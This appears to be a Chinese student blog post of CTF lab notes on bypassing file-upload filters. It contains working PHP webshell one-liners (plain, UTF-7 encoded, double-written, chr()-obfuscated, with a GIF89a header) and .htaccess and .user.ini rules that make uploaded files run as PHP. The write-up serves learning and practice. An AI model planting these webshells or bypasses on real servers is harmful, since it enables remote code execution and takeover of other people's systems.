<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="文件上传漏洞学习"><meta name="keywords" content=""><meta name="author" content="Y."><meta name="copyright" content="Y."><title>文件上传漏洞学习 | Y. blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="Y. blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E5%8F%8A%E9%9D%B6%E6%9C%BA%E7%BB%83%E4%B9%A0"><span class="toc-number">1.</span> <span class="toc-text">文件上传漏洞学习及靶机练习</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#htaccess%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90"><span class="toc-number">1.1.</span> <span class="toc-text">.htaccess任意文件解析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9F%AD%E6%A0%87%E7%AD%BE%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.</span> <span class="toc-text">短标签绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%89%B9%E6%AE%8A%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.</span> <span class="toc-text">特殊编码绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8C%E5%86%99%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.</span> <span class="toc-text">双写绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#user-ini%E7%BB%95%E8%BF%87"><span class="toc-number">1.5.</span> <span class="toc-text">.user.ini绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#htaccess%E6%96%87%E4%BB%B6%E6%8D%A2%E8%A1%8C%E7%BB%95%E8%BF%87"><span class="toc-number">1.6.</span> <span class="toc-text">.htaccess文件换行绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8A%A8%E6%80%81%E6%8B%BC%E6%8E%A5%E5%87%BD%E6%95%B0%E7%BB%95%E8%BF%87%E5%87%BD%E6%95%B0%E8%BF%87%E6%BB%A4"><span class="toc-number">1.7.</span> <span class="toc-text">动态拼接函数绕过函数过滤</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%BE%E7%89%87%E5%A4%B4%E7%BB%95%E8%BF%87"><span class="toc-number">1.8.</span> <span class="toc-text">图片头绕过</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Y.</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">7</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://file.51ppt.vip/2020/2-8/192744-1521977264b903.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Y. blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right"></span></div><div id="post-info"><div id="post-title">文件上传漏洞学习</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-10-24</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="文件上传漏洞学习及靶机练习"><a href="#文件上传漏洞学习及靶机练习" class="headerlink" title="文件上传漏洞学习及靶机练习"></a>文件上传漏洞学习及靶机练习</h1><p>文件上传漏洞顾名思义就是利用文件上传将恶意代码植入服务器中，因此如果不够安全将会导致严重的后果</p>
<h2 id="htaccess任意文件解析"><a href="#htaccess任意文件解析" class="headerlink" title=".htaccess任意文件解析"></a>.htaccess任意文件解析</h2><p>当服务器上传使用黑名单机制时，不让php后缀的文件上传，这时就可以用.htaccess文件重新配置当前文件的后缀解析为其他后缀。<br><strong>将后缀aaa解析为php</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application&#x2F;x-httpd-php .aaa</span><br></pre></td></tr></table></figure>

<h2 id="短标签绕过"><a href="#短标签绕过" class="headerlink" title="短标签绕过"></a>短标签绕过</h2><ul>
<li>当&lt;?php被过滤时可使用短标签绕过，以题目upload2为例</li>
</ul>
<p><strong>当上传一个php文件时，如图</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEB96c11bc1fb08af2b2e56b6f57e23edac?method=download&shareKey=9f62546d1057ac8f0cc8a4c9e9547da6"><br><strong>用&lt;?时也无法上传，此时想到js风格，试一下。</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEB655ddbdc8224dc9acb629f8c237c890d?method=download&shareKey=ef82e7a507ff6e40c7216d3caef073a6"></p>
<p><strong>成功上传，代码如下</strong><br><strong>一句话木马</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language&#x3D;&quot;php&quot;&gt;@eval($_POST[&#39;cmd&#39;]);&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>
<p><strong>用蚁剑拿到flag</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEB90bd2d9c0ee321b892f9611d1f21dfb3?method=download&shareKey=8e14989122ff7b637d0a47527ee08000"></p>
<h2 id="特殊编码绕过"><a href="#特殊编码绕过" class="headerlink" title="特殊编码绕过"></a>特殊编码绕过</h2><ul>
<li>当php所有形式均被过滤掉时考虑使用特殊编码绕过，以题目upload4为例</li>
</ul>
<p><strong>当以&lt;?php形式上传时，如图所示不允许上传php文件</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEB5eadc6313c0bcc1252fe73b2bcaefc76?method=download&shareKey=18c0c1889db0f5876606989312c28bb1"></p>
<p><strong>将&lt;?php去掉，显示上传成功，可知不能出现&lt;?</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEB9837889e6bd08489b4a3d18d08b001fc?method=download&shareKey=64e577567542cc7d91b42f20c6a10ce9"></p>
<p><strong>此时可以用特殊编码绕过，将一句话木马解码UTF-7，<a target="_blank" rel="noopener" href="https://www.novel.tools/encode/UTF-7">UTF-7编码和解码</a>，如图</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEBb3469360a31d857e636ef90c5a5a38e8?method=download&shareKey=8bef2e4a29539c00fafa767be4500cd5"></p>
<p><strong>编码后代码如下</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">+ADw?php +AEA-eval(+ACQAXw-POST+AFs&#39;cmd&#39;+AF0)+ADs?+AD4-</span><br></pre></td></tr></table></figure>
<p><strong>用蚁剑成功拿下flag</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEB055259bf2cb9d90c2a816c1099c041be?method=download&shareKey=e25abf6ea2496b6e20ead338fb6882aa"></p>
<h2 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h2><ul>
<li>当上传文件中php,post,eval均被替换成空时可用，以题目upload3为例</li>
</ul>
<p><strong>首先上传一句话木马，如图php,post,eval均被替换成空。</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEBd899c6f7531e7e59cd45421acc72bef8?method=download&shareKey=6816c93e9397e3076e38e7b8ed7708f7"></p>
<p><strong>双写绕过后，成功上传如图</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEB1ccc34ffd6ae560bcf8285ee377338d7?method=download&shareKey=c02e53a2b1d45a3742fc17f8fe101aa9"></p>
<p><strong>双写</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?pphphp @eevalval($_PPOSTOST[&#39;cmd&#39;]);?&gt;</span><br></pre></td></tr></table></figure>
<p><strong>此时记得修改.htaccess，在做这道题时花费了很长时间，经师兄提醒才知道此处忘改了</strong><br><strong>修改后</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application&#x2F;x-httpd-pphphp .aaa</span><br></pre></td></tr></table></figure>

<h2 id="user-ini绕过"><a href="#user-ini绕过" class="headerlink" title=".user.ini绕过"></a>.user.ini绕过</h2><ul>
<li>假如.htaccess被过滤了，不允许上传，而上传目录下有一个php文件，则可以使用.user.ini将我们制定文件包含到我们目录下的所有PHP文件导致远程代码执行。<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @eval($_POST[&#39;cmd&#39;]);?&gt;</span><br></pre></td></tr></table></figure></li>
<li>.user.ini<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">auto_prepend_file&#x3D;1.aaa</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h2 id="htaccess文件换行绕过"><a href="#htaccess文件换行绕过" class="headerlink" title=".htaccess文件换行绕过"></a>.htaccess文件换行绕过</h2><ul>
<li>上传.htaccess文件时候发现文件内容被过滤。可以使用换行绕过的方法绕过过滤。</li>
</ul>
<p><strong>以upload6为例，当上传.htaccess时如图显示内容不能有application.</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEBfd994b3cc64f177e0ce47f84021dc263?method=download&shareKey=d96168b7e40b01e33cccda0a9b13f1c1"></p>
<p><strong>将.htaccess文件换行绕过</strong><br><strong>换行绕过</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">AddType appli\ </span><br><span class="line">cation&#x2F;x-httpd-php .aaa</span><br></pre></td></tr></table></figure>
<p><strong>再上传一次，成功</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEB930ac90292b1d251e90545e81ad9c3ca?method=download&shareKey=c487087315f4f3b8d8bf934b52ebc420"></p>
<p><strong>用蚁剑拿下flag</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEBa5a4a48cf9342febed002e510ee284f8?method=download&shareKey=6fd0ab77ee55af6769b3e986ee0e3c04"></p>
<h2 id="动态拼接函数绕过函数过滤"><a href="#动态拼接函数绕过函数过滤" class="headerlink" title="动态拼接函数绕过函数过滤"></a>动态拼接函数绕过函数过滤</h2><ul>
<li>当服务器将危险函数过滤时，则考虑使用aiisc码拼接动态构造函数来绕过。</li>
</ul>
<p><strong>以upload7为例，同样先上传一句话木马试试，如图显示不能含有危险函数</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEBbd38778f1b1bbd75058f2833fca75a77?method=download&shareKey=4bb80621518920f4ae73bc4b112456c9"></p>
<p><strong>用bp抓包发现eval和post被过滤，尝试使用动态拼接函数绕过函数过滤，发现上传成功。</strong><br><img src="https://note.youdao.com/yws/api/personal/file/WEB2dfbaa8a3ef5688ebf935c77d97e0129?method=download&shareKey=5094ef3769b67d1d14de5de8048092a5"></p>
<p><strong>输出system</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a &#x3D; chr(115).chr(121).chr(115).chr(116).chr(101).chr(109);</span><br><span class="line">$a(&#39;cat &#x2F;flag&#39;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p><strong>成功拿到flag</strong></p>
<h2 id="图片头绕过"><a href="#图片头绕过" class="headerlink" title="图片头绕过"></a>图片头绕过</h2><p>顾名思义即伪装成图片被识别，绕过检测</p>
<ul>
<li>最简单的就是GIF89a法</li>
</ul>
<p><strong>在phpphp马最前面写入GIF89a</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">GIF89a </span><br><span class="line">&lt;?php </span><br><span class="line">$a &#x3D; chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111); $a(); </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<ul>
<li>XBM文件头绕过</li>
</ul>
<p><strong>在刚开始做题中遇到了许许多多的问题，庆幸的是最后都一一解决了，在这个过程中受益匪浅，也十分感谢在这个过程中帮助我的师兄和同学。</strong></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">Y.</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2020/10/24/文件上传漏洞学习/">http://example.com/2020/10/24/文件上传漏洞学习/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/10/29/%E5%87%A0%E9%81%93%E7%AE%80%E5%8D%95web%E9%A2%98%E5%B0%8F%E8%AE%B0/"><i class="fa fa-chevron-left">  </i><span>几道简单web题小记</span></a></div><div class="next-post pull-right"><a href="/2020/10/18/PHP%E5%9F%BA%E6%9C%AC%E8%AF%AD%E6%B3%95/"><span>PHP基本语法</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://file.51ppt.vip/2020/2-8/192744-1521977264b903.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2020 By Y.</div><div class="framework-info"><span>Driven - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>